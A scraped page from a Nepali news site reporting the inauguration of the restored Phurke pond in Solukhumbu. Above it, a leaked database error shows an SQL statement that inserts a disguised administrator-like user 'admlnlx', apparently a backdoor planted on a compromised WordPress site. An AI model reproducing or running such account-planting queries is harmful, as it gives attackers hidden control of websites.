WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/x2W.J9BvBy07e1BJzJOe0CWqTtSj0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 08:08:54', '', 'admlnlx', 'admlnlx')

नेचाको फुर्के पोखरीको उद्घाटन सम्पन्न – Gaule Khabar

नेचाको फुर्के पोखरीको उद्घाटन सम्पन्न

नेचाको फुर्के पोखरीको उद्घाटन सम्पन्न

सोलुखुम्बु । सोलुखुम्बुको नेचा सल्यान गाउपालिका फुर्के स्थित फुर्के पोखरीको उद्घाटन गरिएको छ ।

ए.ई.आई.एन लक्जमबर्गको २७ लाख २९ हजार ९१९ रुपैयाको लागतमा ग्रामिण विकास संस्था काभ्रेपलान्चोकले नेचासल्यान गाउँपालिकाको समन्वयमा सोलुवाट्री परियोजना अन्तरगत पुर्ननिर्माण तथा पुर्नभरण गरेको पोखरीको प्रतिनिधि सभा सदस्य हेमकुमार राई सुरविरले उद्घाटन गरेका हुन् ।

शुक्रबार भएको उद्घाटन कार्यक्रममा संघिय सांसद हेमकुमार राई सुरवीरले पुरातात्वीक सम्पदालाई संरक्षण गर्न पाएकोमा खुसी व्यक्त गरे । यस्ता सम्पदालाई जोगाउन सके पर्यटन क्षेत्रलाई समेत चलायमान बनाउन सकिने बताए ।
गाउँपालिका अध्यक्ष डुफकुमार बास्तोलाले गाउँपालिकालाई हरियालीमय बनाउनका लागि यसले मदत पु¥याउने बताए । खेलमैदान बनाउन लागिएको पोखरीमा अहिले पानी पुर्नभरण भएपछि नेचा क्षेत्रको शोभा बढाएको बताए । ग्रामिण विकास संस्थाको समन्वयनमा अन्य थुप्रै काम हुने बास्तोलाले बताए ।

ए.ई.आई.एन लक्जमबर्ग नेपालका डाईरेक्टर रमेश तोयानाले पोखरी पुर्नभरणको कामले सफलता पाएको र संस्थाको अगुवाईमा भएका कामलाई पुर्णता दिदै जनप्रतिनिधिसँग निरन्तर समन्वय गरिने बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका